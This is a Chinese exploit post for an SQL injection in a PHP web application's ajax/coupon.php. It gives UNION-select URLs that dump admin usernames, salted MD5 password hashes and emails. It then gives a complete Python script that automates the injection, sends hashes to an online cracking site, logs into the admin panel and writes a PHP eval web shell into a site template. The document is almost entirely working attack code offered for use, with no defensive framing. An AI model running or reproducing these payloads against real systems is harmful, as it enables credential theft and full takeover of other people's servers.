基础函数过滤不全导致注射。
ajax/coupon.php
exp:
1
|
ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23
|
如果不行换成15位
1
|
ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23
|
加密方式md5(password.''@4!@#$%@'')
爆出来的md5后面加上salt(@4!@#$%@)
附上一枚sql注射到getshell的exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
|
#!/usr/bin/env python
#coding=utf-8
import sys;
import re;
import requests;
import cookielib;
import urllib;
import urllib2;
def main():
url=sys.argv[1];
if len(sys.argv)==2:
Exploit(url);
pass;
def Exploit(url):
print "Use of.......";
headers = {''User-Agent'':''Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0''};
exp=("/ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23","/ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23");
for i in range(2):
htmlcontent=requests.get(url+exp[i],headers=headers).text.encode(''utf-8'');
Matching=re.compile(r''\:(\w+\:\w+)\:'');
result=Matching.findall(htmlcontent);
if result:
print u"Use complete "+result[0]+":@4!@#$%@";
md5Crack(result[0],url);
pass;
def md5Crack(result,posturl):
resul=result.split('':'')[1]+":@4!@#$%@";
url="http://www.cmd5.com/default.aspx";
headers = {''Referer'':''http://www.cmd5.com/default.aspx'',''Content-Type'':''application/x-www-form-urlencoded'',''Accept-Language'':''zh-CN,zh;q=0.8'',''User-Agent'':''Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'',''Accept'':''text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'',''Cookie'':''ASP.NET_SessionId=duo0vysxepmc0mwdtvtlz033; CNZZDATA3819543=cnzz_eid%3D1447456137-1406904769-%26ntime%3D1412593037''};
data =urllib.urlencode({"__EVENTTARGET":"Button1","ctl00$ContentPlaceHolder1$TextBoxInput":resul,"ctl00$ContentPlaceHolder1$InputHashType":"md5","ctl00$ContentPlaceHolder1$Button1":"解密","ctl00$ContentPlaceHolder1$HiddenField1":"","ctl00$ContentPlaceHolder1$HiddenField2":"awuMpLTA7raz0/SGwIRToWC1ErLhTCEb7j0RhX44KQ6gSJa0jXKFj0GWMsuyev0h"});
req = urllib2.Request(url,data,headers);
htmlcontent= urllib2.urlopen(req).read();
if re.findall(r''购买'',htmlcontent):
print u"可以购买";
Choice=raw_input("是否getshell Y/N:".decode(''utf-8'').encode(''gbk'')).upper();
if Choice==''Y'':
login(posturl,result);
pass;
elif Choice==''N'':
print u"感谢你的使用";
else:
print u"不能购买请修改语句查询下一个用户试试";
Choice=raw_input("是否getshell Y/N:".decode(''utf-8'').encode(''gbk'')).upper();
if Choice==''Y'':
login(posturl,result);
pass;
elif Choice==''N'':
print u"感谢你的使用";
def login(url,result):
user=result.split('':'')[0];
passwd=raw_input("请输入你破解出来的密码:".decode(''utf-8'').encode(''gbk''));
geturl=url+"/manage/login.php";
getur=url+"/manage/index.php";
content=urllib2.urlopen(url);
res=content.getcode();
if res==200:
posturl=url+"/manage/system/template.php?id=about_job.html";
headers = {''Referer'':getur,''Content-Type'':''application/x-www-form-urlencoded'',''Accept-Language'':''zh-CN,zh;q=0.8'',''User-Agent'':''Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'',''Accept'':''text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'',''Cookie'':''bdshare_firstime=1408212168656; CNZZDATA5760804=cnzz_eid%3D1828295659-1408725529-%26ntime%3D1408776317; iweb_shoppingcart=15f6e9c7a6MDEwODAxMDExMDFkYThlMDFmNTVlZmo4MjkzYDIyM2F7Jmdqb2dxJz9bWCQmeXNvZHxidCYzW115; iweb_safecode=96aeed3e1cNDg4MDgxMDg1M2YxMDk9Nmo2NGc7ZDFhYjlmMjs6PDA; CKFinder_Path=Files%3A%2F%3A1; JishiGou_ra1GaN_auth=97e5%2FUHqnOh1L3nSOMKg2byZPlbiUaCpoxnvrVIL2nEon1EsMPKJvqvEkcEu7e8Yb0aXEg0w5fvKTBUco%2FEL; JishiGou_ra1GaN_sid=2Ix1XP; AJSTAT_ok_times=1; CNZZDATA1670348=cnzz_eid%3D166368451-1411712331-time%3D1412029938; FINDER_showname=on; FINDER_showsize=off; FINDER_showtime=off; FINDER_order=name; FINDER_orderDesc=off; FINDER_view=thumbs; FINDER_displaySettings=off; ECS[visit_times]=16; PHPSESSID=p6fld8b6dvthgcs86iu60ikhn5''};
data =urllib.urlencode({"username":user,"password":passwd,"commit":"登录"});
cj = cookielib.LWPCookieJar();
cookie_support = urllib2.HTTPCookieProcessor(cj)
opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler);
urllib2.install_opener(opener);
req = urllib2.Request(geturl,data,headers);
urllib2.urlopen(req).read();
getshell(url,posturl);
else:
print u"后台地址已修改请找到真实后台地址再进行操作";
def getshell(url,posturl):
url=url+"/about/job.php";
headers = {''Referer'':posturl,''Content-Type'':''application/x-www-form-urlencoded'',''Accept-Language'':''zh-CN,zh;q=0.8'',''User-Agent'':''Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'',''Accept'':''text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'',''Cookie'':''bdshare_firstime=1408212168656; CNZZDATA5760804=cnzz_eid%3D1828295659-1408725529-%26ntime%3D1408776317; iweb_shoppingcart=15f6e9c7a6MDEwODAxMDExMDFkYThlMDFmNTVlZmo4MjkzYDIyM2F7Jmdqb2dxJz9bWCQmeXNvZHxidCYzW115; iweb_safecode=96aeed3e1cNDg4MDgxMDg1M2YxMDk9Nmo2NGc7ZDFhYjlmMjs6PDA; CKFinder_Path=Files%3A%2F%3A1; JishiGou_ra1GaN_auth=97e5%2FUHqnOh1L3nSOMKg2byZPlbiUaCpoxnvrVIL2nEon1EsMPKJvqvEkcEu7e8Yb0aXEg0w5fvKTBUco%2FEL; JishiGou_ra1GaN_sid=2Ix1XP; AJSTAT_ok_times=1; CNZZDATA1670348=cnzz_eid%3D166368451-1411712331-http%253A%252F%252Flocalhost%252F%26ntime%3D1412029938; FINDER_showname=on; FINDER_showsize=off; FINDER_showtime=off; FINDER_order=name; FINDER_orderDesc=off; FINDER_view=thumbs; FINDER_displaySettings=off; ECS[visit_times]=16; PHPSESSID=p6fld8b6dvthgcs86iu60ikhn5''};
data =urllib.urlencode({"template_id":"about_job.html","content":"<?php eval($_POST[''love'']);echo''fuck web''?>","commit":"保存"});
#cj = cookielib.LWPCookieJar();
#cookie_support = urllib2.HTTPCookieProcessor(cj);
#opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler);
#urllib2.install_opener(opener);
req=urllib2.Request(posturl,data,headers);
urllib2.urlopen(req).read();
html=requests.get(url).text;
if re.findall(r''fuck web'',html):
print u"恭喜getshell成功\n";
print u"shell地址: "+url;
print u"密码:love";
else:
print u"getshell失败,请不要气馁,手工再试试,可能有狗";
if __name__ == ''__main__'':
main();
|